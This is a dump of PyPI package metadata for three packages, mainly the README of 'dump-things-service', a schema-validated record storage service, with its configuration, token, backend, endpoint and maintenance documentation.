# Installation To install requirements: `python -m pip install -r requirements.txt` To save requirements: `python -m pip list --format=freeze --exclude-editable -f https://download.pytorch.org/whl/torch_stable.html > requirements.txt` * Note: we use Python 3.9.4 for our experiments # Running the code For the experiments: navigate to the corresponding directory, then execute `python run.py -m` with the corresponding `config.yaml` file (which stores the experiment configs). # License Consult License.md
text/markdown
null
AI Research Team <Ai-model@example.com>
null
null
null
automation, api-client, sync, tooling
[ "Development Status :: 4 - Beta", "Intended Audience :: Developers", "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent" ]
[]
null
null
>=3.8
[]
[]
[]
[ "requests>=2.28.0", "urllib3>=1.26.0" ]
[]
[]
[]
[ "Homepage, https://github.com/ai/library", "Bug Tracker, https://github.com/ai/library/issues" ]
twine/6.2.0 CPython/3.14.3
2026-02-19T22:28:01.792752
openenv_cli-0.0.1.tar.gz
3,563
99/1a/2bfa7cc0bca9b592e5bdcb22207e3e78a8337505f25cd43b022d3c932eeb/openenv_cli-0.0.1.tar.gz
source
sdist
null
false
72147dec7dd973e3468890dbac2f8290
165fc6bc13e39d88fab6902747a5e8dda63aab1673c6a6c466f920688bf616f4
991a2bfa7cc0bca9b592e5bdcb22207e3e78a8337505f25cd43b022d3c932eeb
null
[ "LICENSE.txt" ]
236
2.4
dump-things-service
5.5.0
A simple service to store and retrieve schema-conform data records
### Dump Things Service [![PyPI version fury.io](https://badge.fury.io/py/dump-things-service.svg)](https://pypi.python.org/pypi/dump-things-service/) This is an implementation of a service that allows storing and retrieving data that is structured according to given schemata. Data is stored in **collections**. Each collection has a name and an associated schema. All data records in the collection have to adhere to the given schema. The canonical format for schemas is [LinkML](https://linkml.io/). The service supports schemas that are based on Datalad's *Thing* schema, i.e. on [https://concepts.datalad.org/s/things/v1/](https://concepts.datalad.org/s/things/v1/). It assumes that the classes of stored records are subclasses of `Thing` and inherit the properties `pid` and `schema_type` from the `Thing` base class. The general workflow in the service is as follows. We distinguish between two areas of a collection, an **incoming** area and a **curated** area. Data written to a collection is stored in a collection-specific **incoming** area. A curation process, which is outside the scope of the service, moves data from the incoming area of a collection to the **curated** area of the collection. To submit a record to a collection, a token is required. The token defines read and write permissions for the incoming areas of collections and read permissions for the curated area of a collection. A token can carry permissions for multiple collections. In addition, the token carries a submitter ID. It also defines a token-specific **zone** in the incoming area. Any read and write operations on an incoming area are therefore restricted to the token-specific zone in the incoming area. Multiple tokens can share the same zone. That allows multiple submitters to work together when storing records in the service. The service provides an HTTP-based API to store and retrieve data objects, and to verify token capabilities. 
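The submit-and-retrieve workflow above maps onto the HTTP endpoints documented in the "Endpoints" section. The following is a minimal Python client sketch; the base URL, collection name, class name, and token are illustrative assumptions, not values prescribed by the service:

```python
import json
import urllib.request

# Illustrative base URL; the service defaults to port 8000.
BASE_URL = "http://127.0.0.1:8000"

def record_url(collection, cls):
    """URL of the store endpoint: POST /<collection>/record/<class>"""
    return f"{BASE_URL}/{collection}/record/{cls}"

def records_url(collection, cls):
    """URL of the retrieval endpoint: GET /<collection>/records/<class>"""
    return f"{BASE_URL}/{collection}/records/{cls}"

def store_record(collection, cls, record, token):
    """Store a JSON record; a token with write permission is mandatory."""
    request = urllib.request.Request(
        record_url(collection, cls),
        data=json.dumps(record).encode(),
        headers={
            "Content-Type": "application/json",
            "X-DumpThings-Token": token,  # token header used by the service
        },
        method="POST",
    )
    with urllib.request.urlopen(request) as response:
        return json.load(response)  # list of all stored records

# Example (requires a running service and a valid token):
# store_record("personal_records", "Person", {"pid": "example:alice"}, "some-token")
```

The record lands in the token's zone of the collection's incoming area; it becomes part of the curated area only through the external curation process.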
### Installing the service The service is available on PyPI and can be installed with `pip`. Execute the command `pip install dump-things-service` to install the service. ### Running the service After installation the service can be started via the command `dump-things-service`. The basic service configuration is done via command line parameters and configuration files. The following command line parameters are supported: - `<storage root>`: (mandatory) the path of a directory that serves as anchor for all relative paths given in the configuration files. Unless `-c/--config` is provided, the service will look for the configuration file at `<storage root>/.dumpthings.yaml`. - `--host <IP-address>`: The IP-address on which the service should accept connections (default: `0.0.0.0`). - `--port <port>`: The port on which the service should accept connections (default: `8000`). - `-c/--config <config-file>`: provide a path to the configuration file. The configuration file in `<storage root>/.dumpthings.yaml` will be ignored if it exists. - `--origins <origin>`: add a CORS origin host (repeat to add multiple CORS origin URLs). - `--root-path <path>`: Set the ASGI 'root_path' for applications submounted below a given URL path. - `--log-level`: set the log level for the service; allowed values are `ERROR`, `WARNING`, `INFO`, `DEBUG`. The default level is `WARNING`. ```bash dump-things-service /data-storage/store --host 127.0.0.1 --port 8000 ``` The above command runs the service on the network location `127.0.0.1:8000` and provides access to the store under `/data-storage/store`. ### Configuration file The service is configured via a configuration file that defines collections, paths for incoming and curated data for each collection, as well as token properties. 
Token properties include a submitter identification and, for each collection, an incoming zone specifier, permissions for reading and writing the incoming zone, and permission for reading the curated data of the collection. A "formal" definition of the configuration file is provided by the class `GlobalConfig` in the file `dumpthings-server/config.py`. Configurations are read in YAML format. The following is an example configuration file that illustrates all options: ```yaml type: collections # has to be "collections" version: 1 # has to be 1 # All collections are listed in "collections" collections: # The following entry defines the collection "personal_records" personal_records: # The token, as defined below, that is used if no token is provided by a client. # All tokens that are provided by the client will be OR-ed with the default token. # That means all permissions in the default token will be added to the client provided # token. In this way a client-provided token is always at least as powerful as the # default token. default_token: no_access # The path to the curated data of the collection. This path should contain the # ".dumpthings.yaml"-configuration for collections that is described # here: <https://concepts.datalad.org/dump-things-storage-v0/>. # A relative path is interpreted relative to the storage root, which is provided on # service start. An absolute path is used as-is. curated: curated/personal_records # The path to the incoming data of the collection. # Different collections should have different curated- and incoming-paths incoming: /tmp/personal_records/incoming # Optionally a list of classes that should receive store- or validate-endpoints. # If this list is present, all other classes defined in the schema will be ignored, # i.e., they will not receive store- and validation-endpoints. The classes listed # here must be in the schema. 
use_classes: - Organization - Person - Project - Agent # Optionally a list of classes that will be ignored when store- or validate-endpoints # are created. If `use_classes` is present, the entries of this list will further reduce # the classes that will receive endpoints. If `use_classes` is not present, the entries # of this list will reduce the classes from the schema that will receive endpoints. # The classes listed here must be listed in `use_classes` if that is defined. If # `use_classes` is not defined, they must be listed in the schema. ignore_classes: - Person - Project # The following entry defines the collection "rooms_and_buildings" rooms_and_buildings: default_token: basic_access curated: curated/rooms_and_buildings incoming: incoming/rooms_and_buildings # The following entry defines the collection "fixed_data", which does not # support data uploading, because there is no token that allows uploads to # "fixed_data". fixed_data: default_token: basic_access # If no upload is supported, the "incoming"-entry is not necessary. curated: curated/fixed_data_curated # All tokens are listed in "tokens" tokens: # The following entry defines the token "basic_access". This token allows read-only # access to the two collections: "rooms_and_buildings" and "fixed_data". basic_access: # The value of "user_id" will be added as an annotation to each record that is # uploaded with this token. user_id: anonymous # The collections for which the token holds rights are defined in "collections" collections: # The rights that "basic_access" carries for the collection "rooms_and_buildings" # are defined here. rooms_and_buildings: # Access modes are defined here: # <https://github.com/christian-monch/dump-things-server/issues/67#issuecomment-2834900042> mode: READ_CURATED # A token- and collection-specific label that defines "zones" in which incoming # records are stored. 
Multiple tokens can share the same zone, for example if # many clients with individual tokens work together to build a collection. # (Since this token does not allow write access, "incoming_label" is ignored and # left empty here (TODO: it should not be required in this case)). incoming_label: '' # The rights that "basic_access" carries for the collection "fixed_data" # are defined here. fixed_data: mode: READ_CURATED incoming_label: '' # The following entry defines the token "no_access". This token does not allow # any access and is used as a default token for the collection "personal_records". no_access: user_id: nobody collections: personal_records: mode: NOTHING incoming_label: '' # The following entry defines the token "admin". It gives full access rights to # the collection "personal_records". admin: user_id: Admin collections: personal_records: mode: WRITE_COLLECTION incoming_label: 'admin_posted_records' # The following entry defines the token "contributor_bob". It gives full access # to "rooms_and_buildings" for a user with the id "Bob". contributor_bob: user_id: Bob collections: rooms_and_buildings: mode: WRITE_COLLECTION incoming_label: new_rooms_and_buildings # The following entry defines the token "contributor_alice". It gives full access # to "rooms_and_buildings" for a user with the id "Alice". Bob and Alice share the # same incoming-zone, i.e. "new_rooms_and_buildings". That means they can read # incoming records that the other one posted. contributor_alice: user_id: Alice collections: rooms_and_buildings: mode: WRITE_COLLECTION incoming_label: new_rooms_and_buildings # The following entry defines a hashed token because the key `hashed` is set # to `True`. A hashed token has the structure # `<id>-<sha256>`. It will match an incoming token if the incoming token has # the structure `<id>-<content>` and if sha256(`<content>`) equals `<sha256>`. 
# In this example, if the client presents the token `bob-hello`, he will be # granted access because `sha256('hello')` equals # `2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824` bob-2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824: hashed: True collections: rooms_and_buildings: mode: WRITE_COLLECTION incoming_label: bob # ``` #### Backends The service currently supports the following backends for storing records: - `record_dir`: this backend stores records as YAML-files in a directory structure that is defined [here](https://concepts.datalad.org/dump-things-storage-v0/). It reads the backend configuration from a "record collection configuration file" as described [here](https://concepts.datalad.org/dump-things-storage-v0/). - `sqlite`: this backend stores records in a SQLite database. There is an individual database file, named `__sqlite-records.db`, for each curated area and incoming area. - `record_dir+stl`: here `stl` stands for "schema-type-layer". This backend stores records in the same format as `record_dir`, but adds special treatment for the `schema_type` attribute in records. It removes `schema_type`-attributes from the top-level mapping of a record before storing it as YAML-file. When records are read from this backend, a `schema_type` attribute is added back into the record, using a schema to determine the correct class-URI. In other words, all records stored with this backend will have no `schema_type`-attribute in the top-level, and all records read with this backend will have a `schema_type` attribute in the top-level. - `sqlite+stl`: This backend stores records in the same format as `sqlite`, but adds the same special treatment for the `schema_type` attribute as `record_dir+stl`. Backends can be defined per collection in the configuration file. The backend will be used for the curated area and for the incoming areas of the collection. 
If no backend is defined for a collection, the `record_dir+stl`-backend is used by default. The `+stl`-backends can be useful if an endpoint returns records of multiple classes, because they allow clients to determine the class of each result record. The service guarantees that backends of all types can co-exist independently in the same directory, i.e., there are no name collisions in files that are used for different backends (as long as no class name starts with `.` or `_`). The following configuration snippet shows how to define a backend for a collection: ```yaml ... collections: collection_with_default_record_dir+stl_backend: # This is a collection with the default backend, i.e. `record_dir+stl` and # the default authentication, i.e. config-based authentication. default_token: anon_read curated: collection_1/curated collection_with_forgejo_authentication_source: # This is a collection with the default backend, i.e. `record_dir+stl` and # a forgejo-based authentication source. That means it will use a forgejo # instance to determine the permissions of a token for this collection. # The instance is also used to determine the user-id and the incoming label. # In the case of forgejo, the user-id and the incoming label are the # forgejo login associated with the token. # We still need the name of a default token. If the token is defined in this # config file, its properties will be determined by the # config file. If the token is not defined in the config file, its # properties will be determined by the authentication sources. In this # example by the forgejo-instance at `https://forgejo.example.com`. # If there is more than one authentication source, they will be tried # in the order they are defined in the config file. default_token: anon_read # We still need a default token curated: collection_2/curated # Token permissions, user-ids (for record annotations), and incoming # label can be determined by multiple authentication sources. 
# If no source is defined, `config` will be used, which reads token # information from the config file. # This example explicitly defines `config` and a second authentication # source, a `forgejo` authentication source. auth_sources: - type: forgejo # requires `user`-read and `organization`-read permissions on token # The API-URL of the forgejo instance that should be used url: https://forgejo.example.com/api/v1 # An organization organization: data_handling # A team in the organization. The authorization of the team # determines the permissions of the token team: data_entry_personal # `label_type` determines how an incoming label is created for # a Forgejo token. If `label_type` is `team`, the incoming label # will be `forgejo-team-<organization>-<team>`. If `label_type` # is `user`, the incoming label will be # `forgejo-user-<user-login>` label_type: team # An optional instance id. This is used to disambiguate identical # user IDs on different Forgejo instances. If not set, a hash of # `url` will be used instead. instance_id: forgejo-server-1 # An optional repository. The token will only be authorized # if the team has access to the repository. Note: if `repository` # is set, the token must have at least repository read # permissions. repository: reference-repository # Fallback to the config file. - type: config # check tokens from the configuration file # Multiple authorization sources are allowed. They will be tried in the # order defined in the config file. If an authorization source returns # permissions for a token, those permissions will be used and no other # authorization sources will be queried. # The default authorization source is `config`, which reads the token # permissions, user-id, and incoming from the config file. collection_with_explicit_record_dir+stl_backend: default_token: anon_read curated: collection_3/curated backend: # The record_dir+stl backend is identified by the # type: "record_dir+stl". 
No more attributes are # defined for this backend. type: record_dir+stl collection_with_sqlite_backend: default_token: anon_read curated: collection_4/curated backend: # The sqlite-backend is identified by the # type: "sqlite". It requires a schema attribute # that holds the URL of the schema that should # be used in this backend. type: sqlite schema: https://concepts.inm7.de/s/flat-data/unreleased.yaml ``` #### Authentication and authorization To authenticate and authorize a user based on tokens, dump-things-service uses authentication sources. There are currently two authentication sources: the configuration file and a Forgejo-based authentication source. Authentication sources can be defined individually for each collection: the collection-level key `auth_sources` should contain a list of authentication source configurations. The sources are tried in order until a token is successfully authenticated; if no source authenticates the token, the token is rejected. If no authentication source is defined for a collection, the configuration file is used to authenticate tokens. Two authentication sources are considered identical if the contents of their keys match. If an identical authentication source is listed multiple times in the configuration, only the first instance will be queried; the service ignores the others and issues a warning about `Ignoring duplicate authentication provider...`. 
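The per-collection lookup described above can be sketched as follows; the class and function names are illustrative and do not reflect the service's internal implementation:

```python
from typing import Optional

class AuthSource:
    """Illustrative base class for an authentication source (e.g. config, forgejo)."""

    def __init__(self, config: dict):
        self.config = config  # source configuration; its key contents identify the source

    def authenticate(self, token: str) -> Optional[dict]:
        """Return token permissions, or None if this source cannot authenticate."""
        raise NotImplementedError

def authenticate_token(sources: list, token: str) -> Optional[dict]:
    """Try each configured source in order; the first successful one wins."""
    seen = []
    for source in sources:
        if source.config in seen:
            # identical key contents -> duplicate source, skipped with a warning
            print(f"Ignoring duplicate authentication provider: {source.config}")
            continue
        seen.append(source.config)
        permissions = source.authenticate(token)
        if permissions is not None:
            return permissions  # no further sources are queried
    return None  # no source authenticated the token -> reject
```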
These authentication sources are available: - config: use the configuration file to authenticate tokens - forgejo: use a Forgejo-instance to authenticate tokens All authentication source configurations contain the key `type`. Additional keys are authentication source type-specific. The following configuration snippet contains an example for authentication source configuration: ```yaml collections: collection_with_config_and_forgejo_auth_sources: # Token permissions, user-ids (for record annotations), and incoming # label can be determined by multiple authentication sources. # If no source is defined, `config` will be used, which reads token # information from the config file. # This example explicitly defines `config` and a second authentication # source, a `forgejo` authentication source. auth_sources: - type: forgejo # requires `user`-read and `organization`-read permissions on token # The API-URL of the forgejo instance that should be used url: https://forgejo.example.com/api/v1 # An organization organization: data_handling # A team in the organization. The authorization of the team # determines the permissions of the token team: data_entry_personal # `label_type` determines how an incoming label is created for # a Forgejo token. If `label_type` is `team`, the incoming label # will be `forgejo-team-<organization>-<team>`. If `label_type` # is `user`, the incoming label will be # `forgejo-user-<user-login>` label_type: team # An optional repository. The token will only be authorized # if the team has access to the repository. Note: if `repository` # is set, the token must have at least repository read # permissions. repository: reference-repository # Fallback to the config file. - type: config # check tokens from the configuration file # Multiple authorization sources are allowed. They will be tried in the # order defined in `auth_sources`. 
If an authorization source returns # permissions for a token, those permissions will be used and no other # authorization sources will be queried. # The default authorization source is `config`, which reads the token # permissions, user-id, and incoming label from the config file. ... ``` ##### Config-based authentication ```yaml collections: collection_with_config_authentication: default_token: anon_read curated: collection_5/curated auth_sources: - type: <must be 'config'> # check tokens from the configuration file ... ``` The configuration file will be used to authenticate tokens. ##### Forgejo-based authentication ```yaml collections: collection_with_forgejo_authentication: default_token: anon_read curated: collection_5/curated auth_sources: - type: <must be 'forgejo'> url: <Forgejo API-URL> organization: <organization name> team: <team_name> label_type: <'team' or 'user'> repository: <repository name> # Optional ... ``` The defined Forgejo-instance will be used to authenticate a token. The user ID is the email of the user. If `label_type` is set to `team`, the incoming label is `forgejo-team-<organization-name>-<team-name>`. If `label_type` is set to `user`, the incoming label is `forgejo-user-<user-login>`. The permissions will be fetched from the units `repo.code` and `repo.actions` of the team definition. 
The following mapping is used: | `repo.code` | curated_read | incoming_read | incoming_write | curated_right | zones_access | |-------------|--------------|---------------|----------------|---------------|--------------| | `none` | `False` | `False` | `False` | `False` | `False` | | `read` | `True` | `True` | `False` | `False` | `False` | | `write` | `True` | `True` | `True` | `False` | `False` | | `repo.actions` | curated_read | incoming_read | incoming_write | curated_right | zones_access | |----------------|--------------|---------------|----------------|---------------|--------------| | `none` | `False` | `False` | `False` | `False` | `False` | | `read` | `False` | `False` | `False` | `False` | `False` | | `write` | `True` | `True` | `True` | `True` | `True` | A Forgejo authentication source can authenticate Forgejo-tokens that have at least the following `Read`-permissions: - User: this is required to determine user-related information, i.e. user-email and user login name. - Organization: this is required to determine the membership of a user in a team of an organization. - (Only if `repository` is set in the configuration) Repository: required to determine a team's access to the repository. #### Submission annotation tag The service annotates submitted records with a submitter id and a timestamp. Annotations consist of an annotation tag, defining the class of the annotation, and an annotation value. By default the service will use the class `http://purl.obolibrary.org/obo/NCIT_C54269` for the submitter id and the class `http://semanticscience.org/resource/SIO_001083` for submission time. (Both tags will be converted into CURIEs if the schema of the collection defines an appropriate prefix.) The default annotation tag classes can be overridden in the configuration on a per-collection basis. To override the default tags, add a `submission_tags`-attribute to a collection definition. 
The `submission_tags`-attribute should contain a mapping that maps `submitter_id_tag`, `submitter_time_tag`, or both to an IRI or a CURIE. If the schema defines a matching prefix, IRIs are automatically converted to CURIEs before storing the record. If a tag is given as a CURIE, the service validates that the prefix of the CURIE is defined in the schema of the collection. ```yaml type: collections version: 1 collections: collection_1: default_token: basic_access curated: curated incoming: contributions submission_tags: submitter_id_tag: schema:user_id submission_time_tag: schema:time ... ``` ### Endpoints Most endpoints require a *collection*. These correspond to the names of the "data record collection"-directories (for example `myschema-v3-fmta` in [Dump Things Service](https://concepts.datalad.org/dump-things-storage-v0/)) in the stores. The service provides the following user endpoints (in addition to user endpoints, there exist endpoints for curators; to view them, check the `/docs`-path in an installed service): - `POST /maintenance`: this endpoint allows setting a collection into maintenance mode. In maintenance mode, only tokens with curator-privileges can access the collection. The posted data is a JSON that contains the name of the collection and whether the maintenance state should be active or not, for example: ```json { "collection": "collection_1", "active": true } ``` - `POST /<collection>/record/<class>`: an object of type `<class>` (defined by the schema associated with `<collection>`) can be posted to this endpoint. It will be stored in the incoming area for this collection and the user defined by the provided token. In order to `POST` an object to the service, you MUST provide a valid token in the HTTP-header `X-DumpThings-Token` with write permissions. The endpoint supports the query parameter `format`, to select the format of the posted data. It can be set to `json` (the default) or to `ttl` (Terse RDF Triple Language, a.k.a. Turtle). 
If the `json`-format is selected, the content-type should be `application/json`. If the `ttl`-format is selected, the content-type should be `text/turtle`. The service supports extraction of inlined records as described in [Dump Things Service](https://concepts.datalad.org/dump-things-storage-v0/). On success, the endpoint will return a list of all stored records. The list may contain more than one record if the posted object contains inlined records. - `POST /<collection>/validate/record/<class>`: an object of type `<class>` (defined by the schema associated with `<collection>`) can be posted to this endpoint. It will validate the posted data. In order to `POST` an object to the service, you MUST provide a valid token in the HTTP-header `X-DumpThings-Token` with write permissions. The endpoint supports the query parameter `format`, to select the format of the posted data. It can be set to `json` (the default) or to `ttl` (Terse RDF Triple Language, a.k.a. Turtle). If the `json`-format is selected, the content-type should be `application/json`. If the `ttl`-format is selected, the content-type should be `text/turtle`. The service supports extraction of inlined records as described in [Dump Things Service](https://concepts.datalad.org/dump-things-storage-v0/). On success, the endpoint will return a list of all stored records. The list may contain more than one record if the posted object contains inlined records. - `GET /<collection>/records/<class>`: retrieve all readable objects from collection `<collection>` that are of type `<class>` or any of its subclasses. Objects are readable if the default token or the token provided has the permission to read the objects in the collection. Objects from incoming spaces will take precedence over objects from curated spaces, i.e. if there are two objects with identical `pid` in the curated space and in the incoming space, the object from the incoming space will be returned. 
The endpoint supports the query parameter `format`, which determines the format of the query result. It can be set to `json` (the default) or to `ttl`. The endpoint supports the query parameter `matching`, which is interpreted by `sqlite`-backends and ignored by `record_dir`-backends. If given, the endpoint will only return records for which the JSON-string representation matches the `matching` parameter. Matching supports the wildcard character `%`, which matches any characters. For example, to search for `Alice` anywhere in the JSON-string representation of the record, the `matching` parameter should be set to `%Alice%` or `%alice%` (matching is not case-sensitive). The result is a list of JSON-records or ttl-strings, depending on the selected format. - `GET /<collection>/records/p/<class>`: this endpoint (ending on `.../p/<class>`) provides the same functionality as the endpoint `GET /<collection>/records/<class>` (without `.../p/...`) but supports result pagination. In addition to the query parameters `format` and `matching`, it supports the query parameters `page` and `size`. The `page`-parameter defines the page number to retrieve, starting with 1. The `size`-parameter defines how many records should be returned per page. If no `size`-parameter is given, the default value of 50 is used. Each response will also contain the total number of records and the total number of pages in the result. The response is a JSON object with the following structure: ```json { "items": [ <JSON-record or ttl-string> ], "total": <total number of records in the result>, "page": <current page number>, "size": <number of records per page>, "pages": <number of pages in the result> } ``` - `GET /<collection>/record?pid=<pid>`: retrieve an object with the pid `<pid>` from the collection `<collection>` if the provided token allows reading. If the provided token allows reading of incoming and curated spaces, objects from incoming spaces will take precedence. 
The endpoint supports the query parameter `format`, which determines the format of the query result. It can be set to `json` (the default) or to `ttl`. - `GET /server`: this endpoint provides information about the server. The response is a JSON object with the following structure: ```json { "version": "<version of the server>", "collections": [ { "name": "collection_1", "schema": "https://example.org/schema_1.yaml", "classes": [ "Thing", "Agent", "InstantaneousEvent", "Person" ] }, { "name": "collection_2", "schema": "https://example.org/schema_2.yaml", "classes": [ "Thing", "AnnotationTag", "Organization", "Person" ] } ] } ``` - `GET /<collection>/records/`: retrieve all readable objects from collection `<collection>`. Objects are readable if the default token or the token provided has the permission to read the objects in the collection. Objects from incoming spaces will take precedence over objects from curated spaces, i.e. if there are two objects with identical `pid` in the curated space and in the incoming space, the object from the incoming space will be returned. The endpoint supports the query parameter `format`, which determines the format of the query result. It can be set to `json` (the default) or to `ttl`. The endpoint supports the query parameter `matching`, which is interpreted by `sqlite`-backends and ignored by `record_dir`-backends. If given, the endpoint will only return records for which the JSON-string representation matches the `matching` parameter. The result is a list of JSON-records or ttl-strings, depending on the selected format. - `GET /<collection>/records/p/`: this endpoint (ending on `.../p/`) provides the same functionality as the endpoint `GET /<collection>/records/` (without `.../p/`) but supports result pagination. In addition to the query parameters `format` and `matching`, it supports the query parameters `page` and `size`. The `page`-parameter defines the page number to retrieve, starting with 1.
The `size`-parameter defines how many records should be returned per page. If no `size`-parameter is given, the default value of 50 is used. Each response will also contain the total number of records and the total number of pages in the result. The response is a JSON object with the following structure: ```json { "items": [ <JSON-record or ttl-string> ], "total": <total number of records in the result>, "page": <current page number>, "size": <number of records per page>, "pages": <number of pages in the result> } ``` - `DELETE /<collection>/record?pid=<pid>`: delete an object with the pid `<pid>` from the incoming area of the collection `<collection>` if the provided token allows writing to the incoming area. The result is either `True` if the object was deleted or `False` if the object did not exist or was not deleted. - `GET /docs`: provides information about the service's API, i.e. about all endpoints. #### Curation endpoints The service supports a set of curation endpoints that allow direct access to the curated area as well as the incoming areas. A `CURATOR` token is required to access these endpoints. Details about the curation endpoints can be found in [this issue](https://github.com/christian-monch/dump-things-server/issues/118). ### Tips & Tricks #### Using the same backend for incoming and curated areas The service can be configured in such a way that incoming records are immediately available in the curated area.
To achieve this, the final path of the incoming zone must be the same as the curated area, for example: ```yaml type: collections version: 1 collections: datamgt: default_token: anon_read curated: datamgt/curated incoming: datamgt tokens: anon_read: user_id: anonymous collections: datamgt: mode: READ_CURATED incoming_label: "" trusted-submitter-token: user_id: trusted_submitter collections: datamgt: mode: WRITE_COLLECTION incoming_label: "curated" ``` In this example the curated area is `datamgt/curated` and the incoming area for the token `trusted-submitter-token` is `datamgt` plus the incoming zone `curated`, i.e., `datamgt/curated`, which is exactly the curated area defined for the collection `datamgt`. #### Migrating from `record_dir` (or `record_dir+stl`) to `sqlite` The command `dump-things-copy-store` can be used to copy a collection from a `record_dir` (or `record_dir+stl`) store to a `sqlite` store. The command expects a source and a destination store. Both are given in the format `<backend>:<directory-path>`, where `<backend>` is one of `record_dir`, `record_dir+stl`, `sqlite`, or `sqlite+stl`, and `<directory-path>` is the path to the directory of the store. For example, to migrate a collection from a `record_dir`-backend at the directory `<path-to-data>/penguis/curated` to a `sqlite` backend in the same directory, the following command can be used: ```bash > dump-things-copy-store \ record_dir:<path-to-data>/penguis/curated \ sqlite:<path-to-data>/penguis/curated ``` To migrate from a `record_dir+stl` backend, the command is similar, but a schema has to be supplied via the `-s/--schema` command line parameter. For example: ```bash > dump-things-copy-store \ --schema https://concepts.inm7.de/s/flat-data/unreleased.yaml \ record_dir+stl:<path-to-data>/penguis/curated \ sqlite:<path-to-data>/penguis/curated ``` (Note: a `record_dir:<path>` source can be used to copy from a `record_dir+stl` backend without the schema type layer.
But in this case the copied records will not have a `schema_type` attribute, because the `record_dir` backend does not "put it back in", unlike a `record_dir+stl` backend.) If the source backend is a `record_dir` or `record_dir+stl` backend, and the store was manually modified outside the service (for example, by adding or removing files), it is recommended to run the command `dump-things-rebuild-index` on the source store before copying. This ensures that the index is up to date and all records will be copied. If any backend is a `record_dir+stl` backend, a schema has to be supplied via the `-s/--schema` command line parameter. The schema is used to determine the `schema_type` attribute of the records that are copied. ### Maintenance commands - `dump-things-rebuild-index`: this command rebuilds the persistent index of a `record_dir` store. This should be done after the `record_dir` store was modified outside the service, for example, by manually adding or removing files in the directory structure of the store. - `dump-things-copy-store`: this command copies a collection that is stored in a source store to a destination store. For example, to copy a collection from a `record_dir` store at the directory `<path-to-data>/penguis/curated` to a `sqlite` store in the same directory, the following command can be used: ```bash > dump-things-copy-store \ record_dir:<path-to-data>/penguis/curated \ sqlite:<path-to-data>/penguis/curated ``` The copy command will add the copied records to any existing records in the destination store. Note: when records are copied from a `record_dir` store, the index is used to locate the records in the source store. If the index is not up-to-date, some records may not be copied. To ensure all records are copied, it is recommended to run `dump-things-rebuild-index` on the source store before copying.
- `dump-things-pid-check`: this command checks the pids in all collections of a store to verify that they can be resolved (if they are in CURIE form). This is useful to validate the proper definition of prefixes after schema changes. - `dump-things-create-merged-schema`: this command creates a new schema that statically contains all schemas that the original schema imports. The new schema is fully self-contained and does not reference any other schemas. ### If things go wrong #### Delete a record manually If a schema is changed, for example if a prefix definition changed, the service may not be able to delete a record anymore. In this case, the record can be deleted manually if you have access to the storage root. To delete the record, open a shell and navigate (`cd`) to the directory where the store is located. The location can be determined from the configuration file. Depending on the storage backend, the subsequent steps are different. ##### `record_dir` backend Delete the record from disk by removing it, e.g. `rm -f <path-to-record>`, then run the command `dump-things-rebuild-index`. ##### `sqlite` backend Run the command: ```bash > sqlite3 __sqlite-records.db ``` If you know the pid of the record you want to delete, enter the following on the prompt to delete the record with pid `some-pid`: ```sql > delete from thing where json_extract(thing.object, '$.pid') = 'some-pid'; ``` If you know the IRI of the record you want to delete, enter the following on the prompt to delete the record with IRI `some-iri`: ```sql > delete from thing where iri = 'some-iri'; ``` ### Requirements The service requires sqlite3. ## Acknowledgements This work was funded, in part, by - Deutsche Forschungsgemeinschaft (DFG, German Research Foundation) under grant TRR 379 (546006540, Q02 project) - MKW-NRW: Ministerium für Kultur und Wissenschaft des Landes Nordrhein-Westfalen under the Kooperationsplattformen 2022 program, grant number: KP22-106A
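The manual `sqlite` cleanup described above can be rehearsed safely before touching a real store. The sketch below runs the same pid-based `DELETE` against a throwaway in-memory database with Python's built-in `sqlite3` module; the two-column `thing` table here is a minimal stand-in inferred from the SQL above, not the service's actual schema:

```python
import json
import sqlite3

# In-memory stand-in for __sqlite-records.db; the real schema may differ
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE thing (iri TEXT, object TEXT)")
con.execute(
    "INSERT INTO thing VALUES (?, ?)",
    ("https://example.org/some-iri", json.dumps({"pid": "some-pid"})),
)

# The pid-based delete shown above, parameterized instead of inlined
con.execute(
    "DELETE FROM thing WHERE json_extract(thing.object, '$.pid') = ?",
    ("some-pid",),
)
print(con.execute("SELECT COUNT(*) FROM thing").fetchone()[0])  # → 0
```

Note that `json_extract` requires an SQLite build with JSON support, which current Python distributions ship by default.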
text/markdown
null
Christian Mönch <christian.moench@web.de>
null
null
null
null
[ "Development Status :: 4 - Beta", "Programming Language :: Python", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: P...
[]
null
null
>=3.8
[]
[]
[]
[ "aiohttp", "click", "fastapi-pagination", "fastapi[standard]", "fsspec", "linkml", "pydantic", "pyyaml", "rdflib", "requests", "sqlalchemy", "uvicorn" ]
[]
[]
[]
[ "Documentation, https://github.com/christian-monch/dump-things-server", "Issues, https://github.com/christian-monch/dump-things-server/issues", "Source, https://github.com/christian-monch/dump-things-server" ]
python-httpx/0.28.1
2026-02-19T22:27:51.517996
dump_things_service-5.5.0-py3-none-any.whl
82,716
24/c5/c9318fb6c180f38fd9d133ded13832dc6c59374c8116297b5c3e5e31663c/dump_things_service-5.5.0-py3-none-any.whl
py3
bdist_wheel
null
false
cbd5eb26e6e3678505c1c8b35b292c64
ab96ce2777a753f433f90cfd539a4e4d6d8ef8cf3a9d26f9140487436e2a1181
24c5c9318fb6c180f38fd9d133ded13832dc6c59374c8116297b5c3e5e31663c
MIT
[]
98
2.3
asam-qc-framework
1.1.0
Python ASAM Quality Checker Framework module. Executes bundles and creates result reports.
# asam-qc-framework This is the Python package for the ASAM Quality Checker Framework. Visit the [main GitHub repository](https://github.com/asam-ev/qc-framework) for detailed documentation.
text/markdown
Danilo Romano
danilo@ivex.ai
null
null
MPL-2.0
null
[ "License :: OSI Approved", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: Python :: 3.13" ]
[]
null
null
<4.0,>=3.10
[]
[]
[]
[ "asam-qc-baselib<1.2.0,>=1.1.0", "pydantic<3.0.0,>=2.7.2" ]
[]
[]
[]
[]
poetry/2.1.3 CPython/3.13.12 Windows/10
2026-02-19T22:26:48.122529
asam_qc_framework-1.1.0.tar.gz
13,264
